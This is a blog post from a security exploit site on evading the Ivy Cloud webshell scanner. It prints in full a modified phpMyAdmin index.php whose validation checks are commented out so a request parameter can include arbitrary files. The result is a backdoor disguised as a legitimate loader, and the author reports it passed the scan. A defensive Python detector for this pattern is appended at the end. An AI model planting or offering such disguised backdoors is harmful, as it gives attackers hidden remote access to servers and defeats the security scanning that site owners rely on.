Aquaboutic | Focus Security Research | Vulnerability Exploit | POC


ivy cloud webshell kill bypass

Posted by deeson at 2020-03-23

Last week I saw some friends posting chat logs from the Ivy Cloud group, with red packets of around 200 being handed out. I did a quick test over the weekend. First I tried the webshell that bypasses D-Shield and found that it was flagged as malicious, which is kind of interesting. Reading the chat logs, the principle is to use deep learning; my guess (only a guess) is that it is trained in a supervised way. The bypass idea here is to take an open-source program and modify it to carry a one-line backdoor.

Recall that phpMyAdmin's index.php contains the statement "include ROOT_PATH . $_REQUEST['target'];". Taken out of context, that looks like a file inclusion vulnerability; however, there is filtering and validation above it that prevents including arbitrary files. I changed it so that any file can be included, kept part of the original source, and commented out the code that would interfere with execution (so the file runs in a variety of environments). The final modified code is as follows:

The original statement:

```php
include ROOT_PATH . $_REQUEST['target'];
```

The modified index.php:

```php
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Main loader script
 *
 * @package PhpMyAdmin
 */
declare(strict_types=1);

/*
use PhpMyAdmin\Controllers\HomeController;
use PhpMyAdmin\Core;
use PhpMyAdmin\DatabaseInterface;
use PhpMyAdmin\Response;
use PhpMyAdmin\Url;
use PhpMyAdmin\Util;
*/

if (! defined('ROOT_PATH')) {
    define('ROOT_PATH', ''); // modified here; does not affect the backdoor's file inclusion
}

global $server;

//require_once ROOT_PATH . 'libraries/';

/**
 * pass variables to child pages
 */
$drops = [
    'lang',
    'server',
    'collation_connection',
    'db',
    'table',
];
foreach ($drops as $each_drop) {
    if (array_key_exists($each_drop, $_GET)) {
        unset($_GET[$each_drop]);
    }
}
unset($drops, $each_drop);

/**
 * Black list of all scripts to which front-end must submit data.
 * Such scripts must not be loaded on home page.
 */
$target_blacklist = [
    'import.php',
    'export.php',
];

// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && 0 == strpos($_REQUEST['target'], "index")
    //&& ! in_array($_REQUEST['target'], $target_blacklist)   // blacklist check, commented out
    //&& Core::checkPageValidity($_REQUEST['target'], [], true) // page validity check, also removed
) {
    include ROOT_PATH . $_REQUEST['target'];
    exit;
}
```

I tested that it works normally; after confirming it does, I uploaded it for scanning. The result came back normal, so the bypass is complete. The figure below shows the result (test results on December 29, 2019). For how to use it, see the previous article on bypassing D-Shield.

To sum up, Ivy Cloud does a really good job. There are other ways to bypass it; my approach is to avoid the signatures of eval and assert and to bury the backdoor in the code of an otherwise normal file. Other ideas are left for testing and research. Besides detection, false positives also need to be considered: a normal file I tested was also reported as malicious, so that has to be weighed as well.
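As an added example (not the post's code, and not Ivy Cloud's detection logic), here is a small static check a defender could run over PHP sources to spot the pattern this post relies on: an include or require whose path is built from a request superglobal, with the guard clauses immediately above it commented out. The sample input is a constructed excerpt of the modified loader shown above; the window size and the "//&&" heuristic are assumptions of this example.

```python
import re

# Matches include/require(_once) statements whose operand references a request
# superglobal, i.e. a file inclusion that the HTTP client controls.
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\b[^;]*\$_(?:REQUEST|GET|POST|COOKIE)\b[^;]*;"
)
# A boolean clause that has been commented out: the line's code starts with "//&&".
DISABLED_GUARD_RE = re.compile(r"^\s*//\s*&&")


def find_user_controlled_includes(php_source, window=10):
    """Return [(line_no, statement, disabled_guard_count), ...].

    disabled_guard_count is the number of "//&&" lines within `window` lines
    above the include: a legitimate loader whose validation has been disabled
    (as in the modified phpMyAdmin index.php) scores above zero here.
    """
    lines = php_source.splitlines()
    findings = []
    for idx, line in enumerate(lines, start=1):
        m = INCLUDE_RE.search(line)
        if not m:
            continue
        above = lines[max(0, idx - 1 - window): idx - 1]
        disabled = sum(1 for prev in above if DISABLED_GUARD_RE.match(prev))
        findings.append((idx, m.group(0).strip(), disabled))
    return findings


# Constructed sample: the tail of the modified loader from this post, plus one
# benign require_once with a constant path that must not be flagged.
SAMPLE = r"""<?php
require_once ROOT_PATH . 'libraries/common.inc.php';
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && 0 == strpos($_REQUEST['target'], "index")
    //&& ! in_array($_REQUEST['target'], $target_blacklist)
    //&& Core::checkPageValidity($_REQUEST['target'], [], true)
) {
    include ROOT_PATH . $_REQUEST['target'];
    exit;
}
"""

if __name__ == "__main__":
    for line_no, stmt, disabled in find_user_controlled_includes(SAMPLE):
        print(f"line {line_no}: {stmt}  (commented-out guards above: {disabled})")
```

A finding with a non-zero guard count is a strong reason to diff the file against the vendor's release copy rather than trust its familiar header.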